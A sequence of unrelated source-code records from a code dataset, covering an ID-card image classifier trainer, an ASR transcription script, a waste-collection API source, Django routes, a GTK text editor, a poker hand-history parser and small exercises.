  number_of_classes = self._get_number_of_classes()\n        if self.model_type == \"resnet50\":\n            model = models.resnet50(pretrained=True).to(self.device)\n            # for param in model.parameters():\n            #     param.requires_grad = False\n            model.fc = nn.Sequential(\n                nn.Linear(2048, 128),\n                nn.ReLU(inplace=True),\n                nn.Linear(128, number_of_classes),\n            ).to(self.device)\n            model = model.to(self.device)\n        elif self.model_type == \"resnet18\":\n            model = models.resnet18(pretrained=True).to(self.device)\n            for param in model.parameters():\n                param.requires_grad = False\n            model.fc = nn.Sequential(\n                nn.Linear(512, 128),\n                nn.ReLU(inplace=True),\n                nn.Linear(128, number_of_classes),\n            ).to(self.device)\n            model = model.to(self.device)\n        elif self.model_type == \"resnet34\":\n            model = models.resnet34(pretrained=True).to(self.device)\n            for param in model.parameters():\n                param.requires_grad = False\n            model.fc = nn.Sequential(\n                nn.Linear(512, 128),\n                nn.ReLU(inplace=True),\n                nn.Linear(128, number_of_classes),\n            ).to(self.device)\n            model = model.to(self.device)\n        elif self.model_type == \"resnet101\":\n            model = models.resnet101(pretrained=True).to(self.device)\n            for param in model.parameters():\n                param.requires_grad = False\n            model.fc = nn.Sequential(\n                nn.Linear(2048, 128),\n                nn.ReLU(inplace=True),\n                nn.Linear(128, number_of_classes),\n            ).to(self.device)\n            model = model.to(self.device)\n        elif self.model_type == \"resnet152\":\n            model = models.resnet152(pretrained=True).to(self.device)\n            for param in model.parameters():\n                param.requires_grad = False\n            model.fc = 
nn.Sequential(\n                nn.Linear(2048, 128),\n                nn.ReLU(inplace=True),\n                nn.Linear(128, number_of_classes),\n            ).to(self.device)\n            model = model.to(self.device)\n        elif self.model_type == \"vgg16\":\n            model = models.vgg16(pretrained=True)\n            for param in model.parameters():\n                param.requires_grad = False\n            model.classifier = nn.Sequential(\n                nn.Linear(25088, 128),\n                nn.ReLU(inplace=True),\n                nn.Linear(128, number_of_classes),\n            ).to(self.device)\n            model = model.to(self.device)\n        return model\n\n    def _get_number_of_classes(self):\n        return len([f.path for f in os.scandir(self.dataset_path) if f.is_dir()])\n\n    def get_training_augmentation(self):\n        return lambda img: self.img_transforms(image=np.array(img))\n\n    def _split_dataset_to_dataloaders_and_return_classes(self):\n        dataset = datasets.ImageFolder(self.dataset_path, self.img_transforms)  # use the instance attribute, not the module-level variable\n        classes = dataset.classes\n        self.classes = classes\n        class_to_idx = dataset.class_to_idx\n        self.class_to_idx = class_to_idx\n        train_size = int(self.hparams[\"train_valid_test_split\"][0] * len(dataset))\n        valid_size = int(self.hparams[\"train_valid_test_split\"][1] * len(dataset))\n        test_size = int(self.hparams[\"train_valid_test_split\"][2] * len(dataset))\n        rest = len(dataset) - train_size - valid_size - test_size\n        train_size = train_size + rest\n        if train_size + valid_size + test_size == len(dataset):\n            train_set, valid_set, test_set = torch.utils.data.random_split(\n                dataset, [train_size, valid_size, test_size]\n            )\n        else:\n            try:\n                train_set, valid_set, test_set = torch.utils.data.random_split(\n                    dataset, [train_size + 1, valid_size, test_size]\n                )\n            except ValueError:  # random_split raises ValueError when the sizes do not sum to len(dataset)\n                train_set, valid_set, test_set = torch.utils.data.random_split(\n                    dataset, [train_size, valid_size + 1, test_size]\n                )\n        self.train_set = train_set\n        self.valid_set = valid_set\n        self.test_set = test_set\n        self.metadata_dict.update({\"classes\": classes})\n        self.metadata_dict.update({\"class_to_idx\": class_to_idx})\n\n    def forward(self, x):\n        pred = self.model(x)\n        return pred\n\n    def train_dataloader(self):\n        train_dataloader = torch.utils.data.DataLoader(\n            self.train_set,\n            sampler=ImbalancedDatasetSampler(self.train_set),\n            batch_size=self.hparams[\"batch_size\"],\n            num_workers=10,\n        )\n        return train_dataloader\n\n    def val_dataloader(self):\n        val_dataloader = torch.utils.data.DataLoader(\n            self.valid_set,\n            sampler=ImbalancedDatasetSampler(self.valid_set),\n            batch_size=self.hparams[\"batch_size\"],\n            num_workers=1,\n        )\n        return val_dataloader\n\n    def test_dataloader(self):\n        test_dataloader = torch.utils.data.DataLoader(\n            self.test_set,\n            sampler=ImbalancedDatasetSampler(self.test_set),\n            batch_size=self.hparams[\"batch_size\"],\n            num_workers=1,\n        )\n        return test_dataloader\n\n    def training_step(self, batch, batch_nb):\n        x, y = batch\n        if isinstance(x, dict):\n            x = x[\"image\"]\n        pred = self(x)\n        loss = self.criterion(pred, y)\n        self.log(\"train_loss\", loss)\n        return loss\n\n    def validation_step(self, batch, batch_nb):\n        x, y = batch\n        if isinstance(x, dict):\n            x = x[\"image\"]\n        pred = self(x)\n        loss = self.criterion(pred, y)\n        self.log(\"val_loss\", loss)\n        # Calculate accuracy\n        top_p, top_class = pred.topk(1, dim=1)\n        equals = top_class == y.view(*top_class.shape)\n        accuracy = torch.mean(equals.type(torch.FloatTensor)).item()\n        self.log(\"valid_accuracy\", accuracy)\n        return loss\n\n    def validation_epoch_end(self, outputs):\n        os.makedirs(self.folders_structure[\"metadata_json_folder\"], exist_ok=True)\n        self.metadata_dict.update({\"hparams\": self.hparams})\n        
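# editor's note (assumption): everything placed in metadata_dict here is a plain JSON type (str/int/float/list/dict), which is what the json.dump below requires\n        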
self.metadata_dict.update({\"model_type\": self.model_type})\n json_file_path = os.path.join(\n self.folders_structure[\"metadata_json_folder\"], \"metadata.json\"\n )\n with open(json_file_path, \"w\") as fp:\n json.dump(self.metadata_dict, fp)\n return\n\n def test_step(self, batch, batch_nb):\n x, y = batch\n if isinstance(x, dict):\n x = x[\"image\"]\n pred = self(x)\n loss = self.criterion(pred, y)\n model_export_save_dir_path = os.path.join(\n self.folders_structure[\"models_folder\"]\n )\n os.makedirs(model_export_save_dir_path, exist_ok=True)\n model_name = self.model_type + \".pth\"\n model_save_path = os.path.join(model_export_save_dir_path, model_name)\n torch.save(self.model, model_save_path)\n self.log(\"test_loss\", loss)\n return loss\n\n def configure_optimizers(self):\n optimizer = AdamW_GCC2(self.model.parameters(), lr=self.hparams[\"lr\"])\n return optimizer\n\n\nif __name__ == \"__main__\":\n torch.cuda.empty_cache()\n dataset_path = \"datasets/fake_id_cards_for_oneshot\"\n model_type = \"resnet50\"\n model = UniversaClassificationTrainer(\n dataset_path=dataset_path, model_type=model_type\n )\n checkpoint_save_path = str(Path(__file__).parent / \"checkpoints_staff\")\n n_best_model_save_path = str(Path(__file__).parent / \"n_best_model\")\n checkpoint_callback = ModelCheckpoint(\n monitor=\"val_loss\",\n dirpath=n_best_model_save_path,\n filename=\"{epoch:02d}-{val_loss:.2f}\",\n save_top_k=1,\n mode=\"min\",\n )\n trainer = Trainer(\n gpus=1,\n precision=16,\n auto_lr_find=True,\n benchmark=True,\n max_epochs=1000,\n default_root_dir=checkpoint_save_path,\n check_val_every_n_epoch=1,\n callbacks=[checkpoint_callback],\n )\n # trainer.tune(model)\n # lr_finder = trainer.tuner.lr_find(model, early_stop_threshold=100)\n # new_lr = lr_finder.suggestion()\n # model.hparams['lr'] = new_lr\n trainer.fit(model)\n trainer.test(model)\n","repo_name":"kornellewy/kjn_face_id_system","sub_path":"kjn_face_id_system/id_card_classification_multi_shot/classification_universal_trainscript.py","file_name":"classification_universal_trainscript.py","file_ext":"py","file_size_in_byte":14058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3629039531","text":"import argparse\nimport logging\nfrom pathlib import Path\n\nfrom tqdm import tqdm\n\nfrom zerospot.asr.constants import ASR_FILE_SUFFIX\nfrom zerospot.asr.interface import ASRModelInterface\n\n\ndef parse_args() -> argparse.Namespace:\n \"\"\"\n Parse arguments for exporting.\n Returns: argparse.Namespace.\n \"\"\"\n arguments_parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n arguments_parser.add_argument(\n \"-src\",\n \"--src_dir\",\n help=\"Source directory with .wav (or .mp3) files in it\",\n type=Path,\n required=True,\n )\n arguments_parser.add_argument(\n \"-d\",\n \"--device\",\n help=\"Device (torch.device) for computation.\",\n type=str,\n required=False,\n default=\"cpu\",\n )\n arguments_parser.add_argument(\n \"-f\",\n \"--force_recompute\",\n help=\"Whether to force recompute transcriptions or not\",\n action=\"store_true\",\n default=False,\n )\n arguments_parser.add_argument(\n \"-s\",\n \"--suffix\",\n help=\"Suffix of audio files (.wav or .mp3)\",\n type=str,\n required=False,\n default=\".wav\",\n choices=[\".wav\", \".mp3\"],\n )\n return arguments_parser.parse_args()\n\n\ndef main(\n src_dir: Path, device: str, suffix: str, force_recompute: bool\n) -> None:\n # Setup logger\n 
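# editor's note: logging.basicConfig configures the root logger process-wide, which is acceptable for a CLI entry point like this script\n    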
logging.basicConfig(level=logging.getLevelName(\"INFO\"))\n logger = logging.getLogger(Path(__file__).name)\n\n # Collect audios\n audios = list(src_dir.rglob(f\"*{suffix}\"))\n\n if not force_recompute:\n audios = [\n audio_path\n for audio_path in audios\n if not audio_path.with_suffix(ASR_FILE_SUFFIX).exists()\n ]\n\n logger.info(f\"N. of audios to compute transcriptions: {len(audios)}\")\n\n logger.info(f\"Initializing ASR model interface...\")\n interface = ASRModelInterface(device=device)\n\n logger.info(f\"ASR model inference...\")\n transcriptions = interface.get_transcription(audios)\n\n for transcription, audio_path in tqdm(\n zip(transcriptions, audios), desc=\"Saving transcription files...\"\n ):\n save_path = audio_path.with_suffix(ASR_FILE_SUFFIX)\n transcription.to_json(save_path)\n\n logger.info(\"Computing transcription files is done.\")\n\n\ndef run():\n args = parse_args()\n main(**vars(args))\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"Ryzagi/zero_shot_kws","sub_path":"zerospot/scripts/gather_asr.py","file_name":"gather_asr.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"74146141228","text":"import json\nimport logging\nfrom datetime import datetime\n\nimport requests\nfrom waste_collection_schedule import Collection # type: ignore[attr-defined]\n\n_LOGGER = logging.getLogger(__name__)\n\nTITLE = \"Landskrona - Svalövs Renhållning\"\nDESCRIPTION = \"Source for LSR waste collection.\"\nCOUNTRY = \"se\"\nURL = \"https://www.lsr.nu\"\nTEST_CASES = {\n \"Home\": {\"street_address\": \"Saxtorpsvägen 115, Annelöv\"},\n \"Polisen\": {\"street_address\": \"Herrevadsgatan 11, Svalöv\"},\n}\n\n# {\n# \"containerId\": \"12C\",\n# \"date\": \"2024-01-03T00:00:00\",\n# \"title\": \"Hämtning av restavfall (kärl 370 liter)\",\n# \"typeOfWaste\": \"REST\",\n# \"typeOfWasteDescription\": \"Restavfall\"\n# },\n# {\n# \"containerId\": \"13B\",\n# \"date\": \"2024-01-03T00:00:00\",\n# \"title\": \"Hämtning av matavfall (kärl 140 liter)\",\n# \"typeOfWaste\": \"MAT\",\n# \"typeOfWasteDescription\": \"Matavfall\"\n# }\n\nclass Source:\n def __init__(self, street_address):\n self._street_address = street_address\n\n def fetch(self):\n response = requests.get(\n \"https://minasidor.lsr.nu/api/api/external/schedule/\" + self._street_address,\n )\n\n data = response.json()\n\n entries = []\n for item in data:\n waste_type = item[\"typeOfWasteDescription\"]\n icon = \"mdi:trash-can\"\n if waste_type == \"Trädgårdsavfall\":\n icon = \"mdi:leaf\"\n next_pickup = item[\"date\"]\n next_pickup_date = datetime.fromisoformat(next_pickup).date()\n entries.append(Collection(date=next_pickup_date, t=waste_type, icon=icon))\n\n return entries\n","repo_name":"mampfes/hacs_waste_collection_schedule","sub_path":"custom_components/waste_collection_schedule/waste_collection_schedule/source/lsr_nu.py","file_name":"lsr_nu.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":559,"dataset":"github-code","pt":"37"} +{"seq_id":"5697776056","text":"from django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n path('', views.Inicio, name='index'),\n path('Gaming/', views.listGaming, name='gaming'),\n path('Twitch/', views.listTwitch, name='twitch'),\n path('E-Sport/', views.listEsport, name='esport'),\n path('International/', views.listInternational, name='international'),\n path('Contacto/', views.contactUs, name= 'formContact'),\n path('Contacto/msgContact', views.msgContact, name='msgcontact'),\n path('Suscribirse', views.suscribirse, name='suscribirse'),\n path('Publicaciones//',views.detallePost, name = 'detallePost'),\n]","repo_name":"Guilgamech/nicegaming","sub_path":"apps/publicaciones/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42006196156","text":"'''\nRead the notes carefully\n1. Note you should only replace 'somewhere' and 'YourFunction' with your own model but WITHOUT any other modifications when you submit this file\n2. Run this file on validation set by '' python test.py --testfolder ../Validation_with_labels --num_class 10'', where '../Validation_with_labels' is the path of validation set, 10/107 is number of classes\n'''\n\n## import your model: replace 'somewhere' and 'YourFunction'\nfrom Model import predict\nimport numpy as np\nimport os\nimport argparse\n\n\nif __name__ == \"__main__\":\n # read the test folder\n parser = argparse.ArgumentParser(description='parameters setting')\n parser.add_argument('--testfolder', type=str, default='/dataset/Data10/Validation_with_labels')\n parser.add_argument('--num_class', type=int, default=10)\n\n args = parser.parse_args()\n testfolder = args.testfolder\n print(args.testfolder)\n \n # read true_ids\n true_ids = np.load(os.path.join(testfolder, 'true_ids.npy'))\n \n # read files\n files = os.listdir(testfolder)\n files.sort()\n \n # predict the ids\n predict_ids = []\n time_use = []\n\n\n for filename in files:\n # ignore true_ids.npy\n if filename == 'true_ids.npy':\n continue\n\n data = np.load(os.path.join(testfolder, filename))\n\n predict_id = predict(data, true_ids, args.num_class)\n predict_ids.append(predict_id)\n\n # compute the test accuracy\n test_accuracy = np.mean(np.array(predict_ids) == np.array(true_ids))\n print('Test Accuracy: {:.2f}'.format(test_accuracy))\n","repo_name":"siyuada/WriteId","sub_path":"test_file.py","file_name":"test_file.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11476735247","text":"import environs\n\nenv = environs.Env()\nenv.read_env()\n\nAPI_HOST = env.str(\"API_HOST\", \"localhost\")\nAPI_PORT = env.int(\"API_PORT\", 8000)\nENGINE_POSTGRES_URI = env.str(\n \"ENGINE_POSTGRES_URI\", \"postgresql://localhost/flight_assistant\"\n)\n\nOPENAI_API_KEY = env.str(\"OPENAI_API_KEY\", \"OPENAI_API_KEY\")\n\nOPENAI_SUMMARIZE_PROMPT = env.str(\n \"OPENAI_SUMMARIZE_PROMPT\",\n (\n \"Please provide a summary of change fees and cancellation fees. \"\n \"Please add GBP100 or equivalent in currency to all amounts in summary. 
\"\n        \"Skip introduction and conclusion, start with the main point\"\n    ),\n)\nOPENAI_SUMMARIZE_SETTINGS = {\n    \"model\": env.str(\"OPENAI_SUMMARIZE_MODEL\", \"gpt-3.5-turbo-1106\"),\n    \"temperature\": env.float(\"OPENAI_SUMMARIZE_TEMPERATURE\", 0.2),\n    \"max_tokens\": env.int(\"OPENAI_SUMMARIZE_MAX_TOKENS\", 512),\n    \"top_p\": 1,\n    \"frequency_penalty\": 0,\n    \"presence_penalty\": 0,\n}\n","repo_name":"vuonglv1612/flight-assistant","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1679550806","text":"class Solution:\r\n    def multiply(self, num1: str, num2: str) -> str:\r\n        places = len(num1) + len(num2)\r\n        # Prod 12934 is [4 3 9 2 1]\r\n        product = [0 for _ in range(places)]\r\n\r\n        num1 = num1[::-1]\r\n        num2 = num2[::-1]\r\n\r\n        # schoolbook multiplication: accumulate digit products with carrying\r\n        for place in range(places):\r\n            for d1 in range(place+1):\r\n                # working with num1[d1] & num2[place - d1]\r\n                d2 = place - d1\r\n                if d1 < len(num1) and d2 < len(num2):\r\n                    sub_prod = int(num1[d1]) * int(num2[d2]) + product[place]\r\n                    product[place] = sub_prod % 10\r\n                    product[place + 1] += sub_prod // 10\r\n\r\n        while (product[-1] == 0) and len(product) > 1:\r\n            product = product[:-1]\r\n        return \"\".join(map(str, product[::-1]))\r\n\r\ndef main():\r\n    sol = Solution()\r\n    for i in range(101):\r\n        for j in range(1001):\r\n            if sol.multiply(str(i), str(j)) != str(i*j):\r\n                print(i, j)\r\n    # print(sol.multiply(\"123\",\"123\"))\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"ChoBro1/LeetCode","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1142416921","text":"from os import system \r\nfrom listas import Stack\r\n\r\nclear = lambda: system(\"cls\")\r\n\r\n# Clear the screen\r\nclear()\r\n\r\n# Create the stack instance\r\npila = Stack()\r\n\r\nprint(f\"Is the stack empty?: {pila.Empty()}\")\r\n\r\n# Push elements onto the stack\r\npila.Push(\"Juan\")\r\npila.Push(21)\r\npila.Push(2022)\r\n\r\nprint(f\"\\nIs the stack empty?: {pila.Empty()}\")\r\n\r\nprint(\"\\nElements on the stack:\")\r\npila.Show()\r\n\r\n# Pop an element off the stack\r\npila.Pop()\r\n\r\nprint(\"\\n\\nElements on the stack:\")\r\npila.Show()\r\n\r\n\r\n# Exercise:\r\n# Build a system that stores fields such as the description, unit price, quantity\r\n# and subtotal of each product on an invoice, and show the grand total at the end.\r\n# Offer options to enter a new item and to modify only the last item entered.\r\n# The modification is done by removing the last element and pushing a new element\r\n# with the updated data.\r\n\r\n\r\n\r\n","repo_name":"diegocruzo/MisionTIC2022","sub_path":"2022-05-21/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1031190861","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk, Gio, Pango, Gdk\nimport subprocess\nimport re\n\nclass TextEditor(Gtk.Window):\n\n    def __init__(self):\n        Gtk.Window.__init__(self, title=\"Writher\")\n        self.set_default_size(800, 600)\n\n        # Box layout\n        self.box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)\n        self.add(self.box)\n\n        # HeaderBar\n        self.header_bar = Gtk.HeaderBar()\n        self.header_bar.set_show_close_button(True)\n        self.header_bar.props.title = \"Writher\"\n        self.set_titlebar(self.header_bar)\n\n        # Open button with arrow\n        self.open_button = Gtk.MenuButton.new()\n        self.open_button.set_label('Open \\u25BC')\n        self.header_bar.pack_start(self.open_button)\n\n        # Popover menu with open and save options\n        self.menu = Gio.Menu()\n        self.menu.append(\"Open\", \"app.open\")\n        self.menu.append(\"Save\", \"app.save\")\n        self.open_button.set_menu_model(self.menu)\n        \n        # Font and font-size selection list\n        self.font_combo = Gtk.ComboBoxText()\n\n        # Get available font families using fc-list command\n        output = subprocess.check_output([\"fc-list\", \":lang=en\", \"--format=%{family[0]}\\n\"])\n        font_families = output.decode(\"utf-8\").splitlines()\n\n        # Remove duplicates and sort font families\n        unique_font_families = sorted(set(font_families))\n\n        # Populate the font combo box with the font families\n        for idx, font_family in enumerate(unique_font_families):\n            self.font_combo.insert(idx, font_family, font_family)\n\n        self.font_combo.set_active(0)\n\n        self.font_size_combo = Gtk.ComboBoxText()\n        self.font_size_combo.insert(0, \"8\", \"8\")\n        self.font_size_combo.insert(1, \"10\", \"10\")\n        self.font_size_combo.insert(2, \"12\", \"12\")\n        self.font_size_combo.insert(3, \"14\", \"14\")\n        self.font_size_combo.insert(4, \"16\", \"16\")\n        self.font_size_combo.insert(5, \"18\", \"18\")\n        self.font_size_combo.insert(6, \"20\", \"20\")\n        self.font_size_combo.insert(7, \"22\", \"22\")\n        self.font_size_combo.insert(8, \"24\", \"24\")\n        self.font_size_combo.set_active(4)\n\n        self.font_combo.connect(\"changed\", self.on_font_changed)\n        self.font_size_combo.connect(\"changed\", self.on_font_size_changed)\n\n        font_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=4)\n        font_box.set_margin_start(4)\n\n        # Add the font combo box and font size combo box to the font_box\n        font_box.pack_start(self.font_combo, False, False, 0)\n        font_box.pack_start(self.font_size_combo, False, False, 0)\n\n        # Add the font_box to the right of the \"Open\" button in the headerbar\n        self.header_bar.pack_end(font_box)\n\n        # TextView\n        self.text_view = Gtk.TextView()\n        self.text_view.set_margin_start(0)\n        self.text_view.set_margin_end(0)\n        self.text_view.set_margin_top(0)\n        self.text_view.set_margin_bottom(0)\n        self.text_view.set_left_margin(80)\n        self.text_view.set_right_margin(80)\n        self.text_view.set_top_margin(40)\n        self.text_view.set_bottom_margin(20)\n\n        # Connect the changed signal to update the title\n        self.text_view.get_buffer().connect(\"changed\", self.on_text_buffer_changed)\n\n        # Set word wrapping\n        self.text_view.set_wrap_mode(Gtk.WrapMode.WORD)\n        self.text_buffer = self.text_view.get_buffer()\n\n        # 
ScrolledWindow\n self.scrolled_window = Gtk.ScrolledWindow()\n self.scrolled_window.add(self.text_view)\n\n # Utility pane\n self.utility_pane = Gtk.ListBox()\n self.utility_pane.set_selection_mode(Gtk.SelectionMode.NONE)\n css = b\"\"\"\n list { background-color: inherit; }\n \"\"\"\n self.apply_css(self.utility_pane, css)\n\n self.utility_pane.set_vexpand(False)\n self.utility_pane.set_valign(Gtk.Align.START)\n self.utility_pane.set_selection_mode(Gtk.SelectionMode.NONE)\n self.utility_pane.set_margin_top(20)\n self.utility_pane.set_margin_start(20)\n self.utility_pane.set_margin_end(20)\n\n width, _ = self.get_size()\n utility_pane_width = int(width * 0.11)\n self.utility_pane.set_size_request(utility_pane_width, -1)\n\n self.utility_labels = {\n \"Words\": Gtk.Label.new(\"0\"),\n \"Characters\": Gtk.Label.new(\"0\"),\n \"Sentences\": Gtk.Label.new(\"0\"),\n \"Paragraphs\": Gtk.Label.new(\"0\"),\n \"Reading time\": Gtk.Label.new(\"0\"),\n }\n\n for label in self.utility_labels.values():\n label.set_use_markup(True)\n attr_list = Pango.AttrList()\n attr_list.insert(Pango.attr_weight_new(Pango.Weight.BOLD))\n label.set_attributes(attr_list)\n\n\n for key, label in self.utility_labels.items():\n row = Gtk.ListBoxRow()\n hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=30)\n row.add(hbox)\n label_key = Gtk.Label.new(key + \":\")\n hbox.pack_start(label_key, False, False, 0)\n hbox.pack_start(label, False, False, 0)\n self.utility_pane.add(row)\n\n # Main layout\n self.main_layout = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)\n self.main_layout.pack_start(self.utility_pane, False, False, 0)\n self.main_layout.pack_start(self.scrolled_window, True, True, 0)\n self.box.pack_start(self.main_layout, True, True, 0)\n\n # Open and save actions\n self.application = Gio.Application.get_default()\n self.open_action = Gio.SimpleAction.new(\"open\", None)\n self.open_action.connect(\"activate\", self.open_file)\n self.application.add_action(self.open_action)\n\n self.save_action = Gio.SimpleAction.new(\"save\", None)\n self.save_action.connect(\"activate\", self.save_file)\n self.application.add_action(self.save_action)\n \n # Connect the delete-event signal to the confirm_close function\n self.connect(\"delete-event\", self.confirm_close)\n\n # Connect the window-state-event signal to the on_window_state_changed function\n self.connect(\"window-state-event\", self.on_window_state_changed)\n\n # Connect the size-allocate signal to the on_size_allocate function\n self.connect(\"size-allocate\", self.on_size_allocate)\n \n def apply_css(self, widget, css):\n css_provider = Gtk.CssProvider()\n css_provider.load_from_data(css)\n\n context = widget.get_style_context()\n context.add_provider(css_provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n\n if isinstance(widget, Gtk.Container):\n for child in widget.get_children():\n self.apply_css(child, css)\n\n def update_title(self):\n text_buffer = self.text_view.get_buffer()\n if hasattr(self, 'file_path'):\n file_name = self.file_path.split('/')[-1]\n else:\n start, end = text_buffer.get_bounds()\n content = text_buffer.get_text(start, end, True)\n sentences = content.split('.')\n file_name = ' '.join(sentences[:3]) + \"...\"\n self.header_bar.set_title(f\"Writher - {file_name}\")\n\n def on_text_buffer_changed(self, text_buffer):\n self.update_title()\n\n def open_file(self, action, param):\n file_chooser = Gtk.FileChooserDialog(\n title=\"Open File\",\n parent=self,\n action=Gtk.FileChooserAction.OPEN,\n buttons=(\n Gtk.STOCK_CANCEL,\n 
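# editor's note: Gtk.STOCK_* constants are deprecated since GTK 3.10; plain labels such as '_Cancel' would also work here\n                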
Gtk.ResponseType.CANCEL,\n                Gtk.STOCK_OPEN,\n                Gtk.ResponseType.OK,\n            ),\n        )\n\n        response = file_chooser.run()\n        if response == Gtk.ResponseType.OK:\n            self.file_path = file_chooser.get_filename()\n            with open(self.file_path, \"r\") as f:\n                content = f.read()\n            self.text_view.get_buffer().set_text(content)\n            self.update_title()\n        file_chooser.destroy()\n\n    def save_file(self, action, param):\n        file_chooser = Gtk.FileChooserDialog(\n            title=\"Save File\",\n            parent=self,\n            action=Gtk.FileChooserAction.SAVE,\n            buttons=(\n                Gtk.STOCK_CANCEL,\n                Gtk.ResponseType.CANCEL,\n                Gtk.STOCK_SAVE,\n                Gtk.ResponseType.OK,\n            ),\n        )\n\n        response = file_chooser.run()\n        if response == Gtk.ResponseType.OK:\n            self.file_path = file_chooser.get_filename()\n            text_buffer = self.text_view.get_buffer()\n            start, end = text_buffer.get_bounds()\n            content = text_buffer.get_text(start, end, True)\n            with open(self.file_path, \"w\") as f:\n                f.write(content)\n            self.update_title()\n        file_chooser.destroy()\n\n    def on_font_changed(self, combo):\n        font_name = combo.get_active_text()\n        font_desc = Pango.FontDescription.from_string(font_name + \" \" + str(self.font_size_combo.get_active_text()))\n        self.text_view.modify_font(font_desc)\n\n    def on_font_size_changed(self, combo):\n        font_size = int(combo.get_active_text())\n        font_desc = Pango.FontDescription.from_string(self.font_combo.get_active_text() + \" \" + str(font_size))\n        self.text_view.modify_font(font_desc)\n\n    def unsaved_changes(self):\n        text_buffer = self.text_view.get_buffer()\n        return text_buffer.get_modified()\n\n    def confirm_close(self, widget, event=None):\n        if self.text_buffer.get_modified():\n            dialog = Gtk.MessageDialog(\n                transient_for=self,\n                flags=0,\n                message_type=Gtk.MessageType.QUESTION,\n                buttons=Gtk.ButtonsType.YES_NO,\n                text=\"Unsaved changes detected\",\n            )\n            dialog.format_secondary_text(\n                \"You have unsaved changes. If you close the application now, your changes will be lost. 
Do you want to save your changes before closing?\"\n            )\n            response = dialog.run()\n\n            if response == Gtk.ResponseType.YES:\n                dialog.destroy()\n                self.save_file(None, None)  # save_file expects (action, param); pass placeholders when invoking it directly\n            elif response == Gtk.ResponseType.NO:\n                dialog.destroy()\n                return False\n            else:\n                dialog.destroy()\n                return True\n        return False\n\n    def on_window_state_changed(self, widget, event):\n        fullscreen = event.new_window_state & Gdk.WindowState.FULLSCREEN\n        self.utility_pane.set_visible(not fullscreen)\n\n    def on_size_allocate(self, widget, allocation):\n        width, _ = self.get_size()\n        utility_pane_width = int(width * 0.11)\n        self.utility_pane.set_size_request(utility_pane_width, -1)\n\n    def update_utility_pane(self): \n        text_buffer = self.text_view.get_buffer()\n        start, end = text_buffer.get_bounds()\n        content = text_buffer.get_text(start, end, True)\n\n        words = len(re.findall(r'\\b\\w+\\b', content))\n        self.utility_labels[\"Words\"].set_text(str(words))\n\n        chars = len(content)\n        self.utility_labels[\"Characters\"].set_text(str(chars))\n\n        sentences = len(re.findall(r'[.!?]\\s', content)) + 1\n        self.utility_labels[\"Sentences\"].set_text(str(sentences))\n\n        paragraphs = len(re.findall(r'\\n\\s*\\n', content)) + 1\n        self.utility_labels[\"Paragraphs\"].set_text(str(paragraphs))\n\n        reading_time = int(words / 200) # Assuming 200 words per minute reading speed\n        self.utility_labels[\"Reading time\"].set_text(str(reading_time) + \" min\")\n\n    # Redefine on_text_buffer_changed so it also refreshes the utility pane (the later definition wins)\n    def on_text_buffer_changed(self, text_buffer):\n        self.update_title()\n        self.update_utility_pane()\n\nclass TextEditorApplication(Gtk.Application):\n    \n    def __init__(self):\n        super().__init__(application_id=\"org.monster.writher\")\n        self.window = None\n\n    def do_activate(self):\n        if not self.window:\n            self.window = TextEditor()\n            self.window.set_application(self)\n            self.window.show_all()\n            self.add_window(self.window)\n        self.window.present()\n\n    def do_startup(self):\n        Gtk.Application.do_startup(self)\n    \n    def close_request(self):\n        if self.window:\n            self.window.confirm_close(None)\n        self.quit()\n    \n    def do_delete_event(self, window, event):\n        if self.window.confirm_close(None):\n            self.window.destroy()\n        return True\n\n    def do_window_removed(self, window):\n        if self.get_windows():\n            self.quit()\n    \n    def do_shutdown(self):\n        if self.window:\n            self.window.destroy()\n        Gtk.Application.do_shutdown(self)\n\nif __name__ == \"__main__\":\n    app = TextEditorApplication()\n    app.run(None)\n","repo_name":"hardcoeur/Writher","sub_path":"writher.py","file_name":"writher.py","file_ext":"py","file_size_in_byte":13067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20822575343","text":"import sys\nfrom analyzer.txtanalyzer import TxtAnalyzer\nfrom analyzer.analyzer import AnalyzerException\nfrom handprinter import HandPrinter\n\nclass HandHistoryParser:\n    \n    def parseHistoryTexts(self, historyTexts, ignoreBetSize, useSimpleNames, excludeNoHeroHH):\n        \"\"\"Parse list of input histories and return tuple list with hand id and parsed history\"\"\"\n        \n        parseResult = []\n        \n        for historyText in historyTexts:\n            analyzer = TxtAnalyzer(historyText)\n            analyzer.analyze()\n            \n            #exclude hand history without hero if option is active\n            if((excludeNoHeroHH and analyzer.hero) or not excludeNoHeroHH):\n                handprinter = HandPrinter(analyzer,ignoreBetSize, useSimpleNames)\n                parsedHistory = handprinter.printHand()\n                parseResult.append((analyzer.handId, parsedHistory))\n        \n        return parseResult\n\n    
